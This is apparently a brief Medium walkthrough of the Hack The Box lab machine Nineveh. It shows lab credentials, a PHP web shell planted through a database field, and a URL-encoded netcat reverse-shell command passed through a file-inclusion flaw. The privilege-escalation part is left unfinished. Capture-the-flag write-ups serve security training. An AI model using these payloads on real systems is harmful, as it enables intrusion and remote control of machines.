Nineveh — HTB Walkthrough

ENUMERATION

80 HTTP ENUMERATION

Visiting website and source code
admin : 1q2w3e4r5t

443 ENUMERATION

Login in
creating DB hack.php, Table : shell. Field name : malicious field and Default value = malicious code
DB : ninevehNotes.php ; table : shell ; Field Name : <?php echo system($_REQUEST[“cmd”]); ?> ; default value : text (null)

EXPLOITATION

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%31%30%2e%31%34%2e%31%36%20%31%32%33%34%20%3e%2f%74%6d%70%2f%66
upper bar shows Request LFI format, lower terminal shows Netcat output
Transfer both images on attacker machine
Doing strings on both we see. Nineveh.png gave ssh keys (private Key)
public key
And now doing ssh in amrois . We can get USER.txt

PRIVILEGE ESCALATION

cronjob running

--

--

OSCP | CEH | Cyber Security Enthusiast.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store